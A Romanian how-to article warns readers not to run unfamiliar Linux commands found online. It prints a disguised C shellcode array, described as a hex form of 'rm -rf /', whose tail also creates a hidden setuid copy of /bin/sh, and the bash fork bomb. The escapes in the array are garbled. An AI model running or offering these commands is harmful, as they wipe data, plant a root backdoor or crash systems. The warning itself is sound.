De ce sa nu rulam in Linux orice fragmente de cod luate de pe internet

Configurare noua (How To)

Situatie

Cateodata Linux ni se poate parea confuz si in anumite cazuri pentru anumite proiecte avem nevoie sa lucram cu comenzi noi si atunci mergem si cautam pe net, pe diverse forumuri si luam de bune solutiile postate pe acolo.

As vrea sa va supun atentiei doua exemple de cod periculos, deghizat care circula frecvent pe internet.

Prima, o comanda deghizata care atunci cand este rulata sterge tot de pe Hardisk. Si cea de a doua asa zisa Fork-Bomb (care odata rulata defineste o functie shell care isi tot creaza copii sie insasi)

 

 

Backup

Nu necesita

Solutie

Pasi de urmat

Primul caz:

Iata un fragment de cod care este peste tot pe internet:

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “xebx3ex5bx31xc0x50x54x5ax83xecx64x68”
“xffxffxffxffx68xdfxd0xdfxd9x68x8dx99”
“xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7”
“x56x04xf7x56x08xf7x56x0cx83xc4x74x56”
“x8dx73x08x56x53x54x59xb0x0bxcdx80x31”
“xc0x40xebxf9xe8xbdxffxffxffx2fx62x69”
“x6ex2fx73x68x00x2dx63x00”
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

Aceasta este versiunea hex a comenzii "rm -rf /"
- această comandă odata executata va șterge fișierele la fel ca și cum ai fi executat rm -rf /.
rm - Eliminați următoarele fișiere
-rf -ruleaza rm recursiv (șterge toate fișierele și folderele din interiorul folderul specificat) și 
forțeaza in a elimina toate fișierele fără a vă solicita.
/ - Spune rm să înceapă de la directorul rădăcină, care conține toate fișierele de pe computerul dvs
și toate dispozitivele media montate, inclusiv fișiere shareuite remote și unități de stocare amovibile.

Al doilea caz:

:(){ :|: & };: – Fork Bomb

Linia de mai jos este o funcție bash simplă ca aspect, dar foarte periculoasa
:(){ :|: & };:
Această linie scurtă definește o funcție shell care creează noi copii ale sale.
Procedeul se reproduce în mod continuu, iar copiile sale se multiplică în mod continuu, luând rapid toate resursele CPU-ului
și toata memoria. Acest lucru poate determina calculatorul să se blocheze. 
Este de fapt un atac de tip denial-of-service.
1

Concluzia si mai degraba lectia pe care trebuie sa o retineti este sa nu rulati comenzi pe care nu le intelegeti, ciudate si evident deghizate !

Tip solutie

Permanent

Voteaza

(12 din 30 persoane apreciaza acest articol)

Despre Autor

Leave A Comment?